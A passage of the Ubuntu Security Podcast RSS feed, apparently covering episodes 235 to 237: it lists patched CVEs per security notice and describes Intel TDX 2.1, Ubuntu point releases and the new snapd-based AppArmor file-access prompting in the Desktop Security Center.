<li>Improved rule management summaries and better messaging of overlapping or redundant prompts.</li>
<li>Expansion of the prompting system to cover additional snap interfaces such as camera and microphone access.</li>
<li>Smarter client side analysis of prompts, recommending additional options if multiple similar prompts are detected.</li>
</ul>
</li>
</ul>
<h3 id="version-2-dot-1-of-intel-tdx-on-ubuntu-24-dot-04-lts-released--11-46">Version 2.1 of IntelⓇ TDX on Ubuntu 24.04 LTS Released (11:46)</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/version-2-1-of-intel-tdx-on-ubuntu-24-04-lts-released/47918/1">https://discourse.ubuntu.com/t/version-2-1-of-intel-tdx-on-ubuntu-24-04-lts-released/47918/1</a></li>
<li>Confidential computing - using TDX to run VMs in confidential mode - runs
workloads (VMs) in hardware-backed isolated execution environments (Trust
Domains). VM memory isolation via encryption in hardware so can&rsquo;t be accessed
by the hypervisor, remote attestation etc (<a href="/episode-230/#confidential-computing-with-ijlal-loutfi-and-karen-horovitz--01-17">Confidential Computing with Ijlal
Loutfi and Karen Horovitz from Episode 230</a>)</li>
<li><a href="https://discourse.ubuntu.com/t/intel-tdx-1-0-technology-preview-available-on-ubuntu-23-10/40698">https://discourse.ubuntu.com/t/intel-tdx-1-0-technology-preview-available-on-ubuntu-23-10/40698</a></li>
<li>Scripting to setup the required elements to use TDX on Ubuntu 24.04 host and
then setup guest VMs to run in confidential mode
<ul>
<li>Install server image, run scripts, enable TDX in BIOS, create VM images etc</li>
<li>Can also configure remote attestation of VM too</li>
</ul>
</li>
<li>See full changes at <a href="https://github.com/canonical/tdx/releases/tag/2.1">https://github.com/canonical/tdx/releases/tag/2.1</a></li>
</ul>
<h3 id="ubuntu-22-dot-04-dot-5-lts-released--13-45">Ubuntu 22.04.5 LTS released (13:45)</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/jammy-jellyfish-point-release-changes/29835/8">https://discourse.ubuntu.com/t/jammy-jellyfish-point-release-changes/29835/8</a>
<ul>
<li>Only covers changes in main and restricted, doesn&rsquo;t list security updates either</li>
</ul>
</li>
<li><a href="https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668">https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668</a></li>
</ul>
<h3 id="apparmor-security-update-for-cve-2016-1585-published--14-23">AppArmor security update for CVE-2016-1585 published (14:23)</h3>
<ul>
<li><a href="/episode-226/#upcoming-apparmor-security-update-for-cve-2016-1585">Upcoming AppArmor Security update for CVE-2016-1585 from Episode 226</a></li>
<li><a href="https://discourse.ubuntu.com/t/upcoming-apparmor-security-update-for-cve-2016-1585/44268/3">https://discourse.ubuntu.com/t/upcoming-apparmor-security-update-for-cve-2016-1585/44268/3</a></li>
<li>Now published to -updates pocket for 20.04 LTS and 22.04 LTS</li>
<li>Will be published to -security pocket next week</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E237.mp3" length="16295769" type="audio/mpeg" /><itunes:duration>976</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 236
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-236/</link>
          <pubDate>Fri, 06 Sep 2024 19:50:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>4428df5db1d81db94dedbf11924c70b41b7bd60a4c1aa7a2465591be0039ce48267a396e6f4e4e5cef6853ad990c7e4d0fff0e3514fc942cfa84d567084724bc</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 236</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The long awaited preview of snapd-based AppArmor file prompting is finally
  seeing the light of day, plus we cover the recent 24.04.1 LTS release and the
  podcast officially moves to a fortnightly cycle.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  The long awaited preview of snapd-based AppArmor file prompting is finally
  seeing the light of day, plus we cover the recent 24.04.1 LTS release and the
  podcast officially moves to a fortnightly cycle.
  </itunes:summary>
        <description>  The long awaited preview of snapd-based AppArmor file prompting is finally
  seeing the light of day, plus we cover the recent 24.04.1 LTS release and the
  podcast officially moves to a fortnightly cycle.
  </description>
        <googleplay:description>  The long awaited preview of snapd-based AppArmor file prompting is finally
  seeing the light of day, plus we cover the recent 24.04.1 LTS release and the
  podcast officially moves to a fortnightly cycle.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The long awaited preview of snapd-based AppArmor file prompting is finally
seeing the light of day, plus we cover the recent 24.04.1 LTS release and the
podcast officially moves to a fortnightly cycle.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>45 unique CVEs addressed</p>
<h3 id="usn-6972-4-linux-kernel--oracle--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6972-4">USN-6972-4</a>] Linux kernel (Oracle) vulnerabilities</h3>
<ul>
<li>18 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52470">CVE-2023-52470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26687">CVE-2024-26687</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36901">CVE-2024-36901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26654">CVE-2024-26654</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26679">CVE-2024-26679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39484">CVE-2024-39484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52806">CVE-2023-52806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52760">CVE-2023-52760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35955">CVE-2024-35955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52629">CVE-2023-52629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26600">CVE-2024-26600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36940">CVE-2024-36940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39292">CVE-2024-39292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52644">CVE-2023-52644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35835">CVE-2024-35835</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26903">CVE-2024-26903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24860">CVE-2024-24860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-22099">CVE-2024-22099</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6982-1-dovecot-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6982-1">USN-6982-1</a>] Dovecot vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-23185">CVE-2024-23185</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23184">CVE-2024-23184</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6983-1-ffmpeg-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6983-1">USN-6983-1</a>] FFmpeg vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-32230">CVE-2024-32230</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6984-1-webob-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6984-1">USN-6984-1</a>] WebOb vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-42353">CVE-2024-42353</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6973-4-linux-kernel--raspberry-pi--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6973-4">USN-6973-4</a>] Linux kernel (Raspberry Pi) vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52760">CVE-2023-52760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52629">CVE-2023-52629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46926">CVE-2021-46926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26921">CVE-2024-26921</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26929">CVE-2024-26929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36901">CVE-2024-36901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39484">CVE-2024-39484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26830">CVE-2024-26830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24860">CVE-2024-24860</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6981-2-drupal-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6981-2">USN-6981-2</a>] Drupal vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28949">CVE-2020-28949</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28948">CVE-2020-28948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13671">CVE-2020-13671</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 of these are in the CISA KEV - <a href="/episode-231/#discussion-of-cisa-kev">Discussion of CISA KEV from Episode 231</a></li>
</ul>
<h3 id="usn-6986-1-openssl-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6986-1">USN-6986-1</a>] OpenSSL vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-6119">CVE-2024-6119</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6987-1-django-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6987-1">USN-6987-1</a>] Django vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-45231">CVE-2024-45231</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-45230">CVE-2024-45230</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6988-1-twisted-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6988-1">USN-6988-1</a>] Twisted vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-41810">CVE-2024-41810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-41671">CVE-2024-41671</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6985-1-imagemagick-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6985-1">USN-6985-1</a>] ImageMagick vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12979">CVE-2019-12979</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12978">CVE-2019-12978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12976">CVE-2019-12976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12975">CVE-2019-12975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12974">CVE-2019-12974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11598">CVE-2019-11598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11597">CVE-2019-11597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11472">CVE-2019-11472</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11470">CVE-2019-11470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10650">CVE-2019-10650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10131">CVE-2019-10131</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-24-dot-04-dot-1-lts-released--02-55">Ubuntu 24.04.1 LTS released (02:55)</h3>
<ul>
<li>On 29th August - <a href="https://lists.ubuntu.com/archives/ubuntu-announce/2024-August/000304.html">https://lists.ubuntu.com/archives/ubuntu-announce/2024-August/000304.html</a></li>
<li><a href="https://discourse.ubuntu.com/t/ubuntu-24-04-lts-noble-numbat-release-notes/39890">https://discourse.ubuntu.com/t/ubuntu-24-04-lts-noble-numbat-release-notes/39890</a></li>
<li>Discussed high level features previously in <a href="/episode-227/#ubuntu-24-dot-04-lts--noble-numbat--released--14-27">Ubuntu 24.04 LTS (Noble Numbat) released from Episode 227</a>
<ul>
<li>New security features / improvements:
<ul>
<li>Unprivileged user namespace restrictions</li>
<li>Binary hardening</li>
<li>AppArmor 4</li>
<li>Disabling of old TLS versions</li>
<li>Upstream Kernel Security Features
<ul>
<li>Intel shadow stack support</li>
<li>Secure virtualisation with AMD SEV-SNP and Intel TDX</li>
<li>Strict compile-time bounds checking</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>Initially offered upgrades from 22.04 but this has been <a href="https://lists.ubuntu.com/archives/ubuntu-release/2024-September/006225.html">pulled just recently</a>
due to <a href="https://bugs.launchpad.net/ubuntu/+source/ubuntu-release-upgrader/+bug/2078720">reports</a> of a critical bug in the ubuntu-release-upgrader package and
its interaction with the apt solver - essentially resulting in packages like
linux-headers being in an broken state since it would remove some packages
that were seen as obsolete but which were still required due to other packages
depending on them
<ul>
<li>likely will not be fixed until early next week</li>
</ul>
</li>
</ul>
<h3 id="ubuntu-security-center-with-snapd-based-apparmor-home-file-access-prompting-preview--05-45">Ubuntu Security Center with snapd-based AppArmor home file access prompting preview (05:45)</h3>
<ul>
<li><a href="https://news.itsfoss.com/ubuntu-security-center-near-stable/">https://news.itsfoss.com/ubuntu-security-center-near-stable/</a></li>
<li>Details the new Desktop Security Center application
<ul>
<li>Written by the Ubuntu Desktop team - new application built using Flutter +
Dart etc and published a snap</li>
<li>Eventually this will allow to manage various security related things like
full-disk encryption, enabling/usage of Ubuntu Pro, Firewall control and
finally for snap permission prompting
<ul>
<li>this last feature is the only one currently supported - has a single
toggle which is to enable &ldquo;snaps to ask for system permissions&rdquo; -
aka. snapd-based AppArmor prompting</li>
<li>and then once this is enabled, allows the specific permissions to be
futher fine-tuned</li>
</ul>
</li>
</ul>
</li>
</ul>
<figure><img src="/img/desktop-security-center-main.png">
</figure>

<ul>
<li>What is AppArmor?</li>
<li>AppArmor policies - and MAC systems in general are static - policy defined by
sysadmin etc</li>
<li>Not well suited for dynamic applications that are controlled by a user - like
desktop / CLI etc - can&rsquo;t know in advance every possible file a user may want
to open in say Firefox so have to grant access to all files in home directory
just in case</li>
<li>Ideally system would only allow files that the user explicitly chooses -
number of ways this can be done, <a href="https://flatpak.github.io/xdg-desktop-portal/docs/">XDG Portals</a> one such way - using Powerbox
concept pioneered in tools from the object-capability based security community
like CapDesk/Polaris and <a href="http://plash.beasts.org/powerbox.html">Plash</a> (principle of least-authority shell) - access
is mediated by a privileged component that acts with the users whole authority
to then delegate some of that authority to the application - seen say in the
file-chooser dialog with portals - this runs outside of the scope of the
application itself and so has the full, unrestricted access to the system to
allow a file to be chosen - then the application is then just given a
file-descriptor to the file to grant it the access (or similar)</li>
<li>This only works in the case of applications that open files interactively -
can&rsquo;t allow the user to explicitly grant access to the configuration file that
gets loaded from a well-known path at startup in a server application etc</li>
<li>One way to handle that case is to alert the user and explicitly prompt them
for that access - and this is currently how this new prompting feature works</li>
<li>When the feature is enabled, the usual broad-based access rules for the <code>home</code>
interface in snapd get tagged with a prompt attribute - any access then which
would normally be allowed is instead delegated to a trusted helper application
which displays a dialog to the user asking them to explicitly allow such
access</li>
</ul>
<figure><img src="/img/desktop-security-center-prompt.png">
</figure>

<ul>
<li>since this happens directly in the system-call path within the kernel, the
application itself is unaware that this is happening - but is just suspended
whilst waiting for the users response - and then assuming they grant the
access it proceeds as normal (or if they deny then the application gets a
permission denied error)</li>
<li>Completely transparent to the application and supports any kind of file-access
regardless of which API might be used (unlike portals which only support the
regular file-chooser scenario)</li>
<li>Allows tighter control of what files a snap is granted access to - and can be
managed by the user in the Security Center later to revoke any such permission
that they granted</li>
</ul>
<p><img src="/img/desktop-security-center-manage.png" alt="">
<img src="/img/desktop-security-center-manage-home.png" alt="">
<img src="/img/desktop-security-center-manage-home-rules-for-snap.png" alt=""></p>
<ul>
<li>Has been in development for a long time, and is certainly not a new concept -
seccomp has supported this via the <a href="https://manpages.ubuntu.com/manpages/noble/man2/seccomp_unotify.2.html"><code>seccomp_unotify</code></a> interface - allows to
delegate seccomp decisions to userspace in a very similar manner - existed
since the 5.5 kernel released in January 2020</li>
<li>Even before that, prototype LSMs existed which implemented this kind of
functionality (<a href="https://sourceforge.net/projects/pulse-lsm/">https://sourceforge.net/projects/pulse-lsm/</a> /
<a href="https://crpit.scem.westernsydney.edu.au/confpapers/CRPITV81Murray.pdf">https://crpit.scem.westernsydney.edu.au/confpapers/CRPITV81Murray.pdf</a>)
<!-- raw HTML omitted -->
</li>
<li>Can test this now on an up-to-date 24.04 or 24.10 install
<ul>
<li>Need to use snapd from the latest/edge channel and then install both the
<code>desktop-security-center</code> snap as well as the <code>prompting-client</code> snap</li>
<li>Launch Security Center and toggle the option</li>
</ul>
</li>
<li>Note this is experimental but has undergone a fair amount of internal testing</li>
<li>Very exciting to see this finally available in this pre-release stage - has
been talked about since at least <a href="https://forum.snapcraft.io/t/classic-confinement-for-ubuntu-watch-packages-snap/3834/9">2018</a></li>
<li>Give it a spin and provide feedback - I would suggest to use the link in the
security center application itself for this but it is not working currently -
instead report via a Github issue on the <a href="https://github.com/canonical/desktop-security-center/issues">desktop-security-center</a> project</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E236.mp3" length="18852490" type="audio/mpeg" /><itunes:duration>1103</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 235
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-235/</link>
          <pubDate>Fri, 23 Aug 2024 14:44:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>e902b6e61b762c5b2de767bad9aeae3cae72fdff4f0b0e0236b612c9ae6512df40c5a50464e1cfc2463bf4ae82521f29338e3715f49b0cb7b7b4a004751a3738</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 235</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A recent Microsoft Windows update breaks Linux dual-boot - or does it? This week
  we look into reports of the recent Windows patch-Tuesday update breaking
  dual-boot, including a deep-dive into the technical details of Secure Boot,
  SBAT,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  A recent Microsoft Windows update breaks Linux dual-boot - or does it? This week
  we look into reports of the recent Windows patch-Tuesday update breaking
  dual-boot, including a deep-dive into the technical details of Secure Boot,
  SBAT, grub, shim and more, plus we look at a vulnerability in GNOME Shell and
  the handling of captive portals as well.
  </itunes:summary>
        <description>  A recent Microsoft Windows update breaks Linux dual-boot - or does it? This week
  we look into reports of the recent Windows patch-Tuesday update breaking
  dual-boot, including a deep-dive into the technical details of Secure Boot,
  SBAT, grub, shim and more, plus we look at a vulnerability in GNOME Shell and
  the handling of captive portals as well.
  </description>
        <googleplay:description>  A recent Microsoft Windows update breaks Linux dual-boot - or does it? This week
  we look into reports of the recent Windows patch-Tuesday update breaking
  dual-boot, including a deep-dive into the technical details of Secure Boot,
  SBAT, grub, shim and more, plus we look at a vulnerability in GNOME Shell and
  the handling of captive portals as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A recent Microsoft Windows update breaks Linux dual-boot - or does it? This week
we look into reports of the recent Windows patch-Tuesday update breaking
dual-boot, including a deep-dive into the technical details of Secure Boot,
SBAT, grub, shim and more, plus we look at a vulnerability in GNOME Shell and
the handling of captive portals as well.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>135 unique CVEs addressed</p>
<h3 id="usn-6960-1-rmagick-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6960-1">USN-6960-1</a>] RMagick vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5349">CVE-2023-5349</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6951-2-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6951-2">USN-6951-2</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>83 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48674">CVE-2022-48674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39471">CVE-2024-39471</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39292">CVE-2024-39292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36270">CVE-2024-36270</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36904">CVE-2024-36904</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38618">CVE-2024-38618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36014">CVE-2024-36014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36941">CVE-2024-36941</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38637">CVE-2024-38637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38613">CVE-2024-38613</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36286">CVE-2024-36286</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36902">CVE-2024-36902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38599">CVE-2024-38599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39301">CVE-2024-39301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39475">CVE-2024-39475</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36954">CVE-2024-36954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-33621">CVE-2024-33621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38552">CVE-2024-38552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36950">CVE-2024-36950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38582">CVE-2024-38582</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36015">CVE-2024-36015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52434">CVE-2023-52434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38659">CVE-2024-38659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36940">CVE-2024-36940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38607">CVE-2024-38607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39480">CVE-2024-39480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38583">CVE-2024-38583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52882">CVE-2023-52882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39467">CVE-2024-39467</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39489">CVE-2024-39489</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38601">CVE-2024-38601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27019">CVE-2024-27019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52752">CVE-2023-52752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36960">CVE-2024-36960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38549">CVE-2024-38549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38567">CVE-2024-38567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38587">CVE-2024-38587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38635">CVE-2024-38635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38598">CVE-2024-38598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38612">CVE-2024-38612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38579">CVE-2024-38579</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27401">CVE-2024-27401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36946">CVE-2024-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36017">CVE-2024-36017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48772">CVE-2022-48772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36905">CVE-2024-36905</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35947">CVE-2024-35947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38381">CVE-2024-38381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38565">CVE-2024-38565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38589">CVE-2024-38589</a> <!-- raw HTML omitted --></li>
